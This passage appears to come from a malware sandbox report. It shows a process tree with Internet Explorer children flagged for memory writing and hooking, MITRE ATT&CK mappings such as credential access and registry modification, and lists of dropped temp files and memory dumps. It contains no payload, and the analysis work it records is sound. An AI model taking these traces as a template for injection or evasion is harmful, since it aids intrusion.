  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\65A4.bi1"
  2⤵
  PID:3384
- C:\Program Files\Windows Mail\WinMail.exe
  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
  2⤵
  PID:3972

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3432

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:4088
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4088 CREDAT:82945 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Checks whether UAC is enabled
  - Modifies Internet Explorer settings
  PID:2560
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4088 CREDAT:82950 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Checks whether UAC is enabled
  - Modifies Internet Explorer settings
  PID:3608

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

Download Submit
C:\Users\Admin\AppData\Local\Temp\6540.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\6540.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\65A4.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\65A4.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9C4A.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9E1F.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\lxdlcmcs\lxdlcmcs.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\lymCsi.txt

Download Submit
C:\Users\Admin\AppData\Local\Temp\zkftt52b\zkftt52b.dll

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lxdlcmcs\CSCE12C0745587E40819B1C7B675FC5D35F.TMP

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lxdlcmcs\lxdlcmcs.0.cs

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lxdlcmcs\lxdlcmcs.cmdline

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zkftt52b\CSCCFD34CEAE7D04CB28360BF13C6421431.TMP

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zkftt52b\zkftt52b.0.cs

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zkftt52b\zkftt52b.cmdline

Download Submit
\Users\Admin\AppData\Local\Temp\lymCsi.txt

Download Submit
memory/1656-21-0x0000026404E20000-0x0000026404ED1000-memory.dmp

Filesize
708KB

Download
memory/1656-18-0x0000026402AD0000-0x0000026402AD1000-memory.dmp

Filesize
4KB

Download
memory/2128-20-0x0000026F0BD80000-0x0000026F0BD81000-memory.dmp

Filesize
4KB

Download
memory/2992-19-0x00000000060D0000-0x0000000006181000-memory.dmp

Filesize
708KB

Download
memory/2992-17-0x00000000051F0000-0x00000000052A1000-memory.dmp

Filesize
708KB

Download
memory/2992-15-0x00000000051F0000-0x00000000052A1000-memory.dmp

Filesize
708KB

Download
memory/2992-12-0x0000000000740000-0x0000000000741000-memory.dmp

Filesize
4KB

Download
memory/3432-14-0x0000029621900000-0x0000029621901000-memory.dmp

Filesize
4KB

Download
memory/3892-13-0x000002769E680000-0x000002769E731000-memory.dmp

Filesize
708KB

Download
memory/3972-28-0x000002372C010000-0x000002372C011000-memory.dmp

Filesize
4KB

Download
memory/4088-16-0x00000192BE320000-0x00000192BE321000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads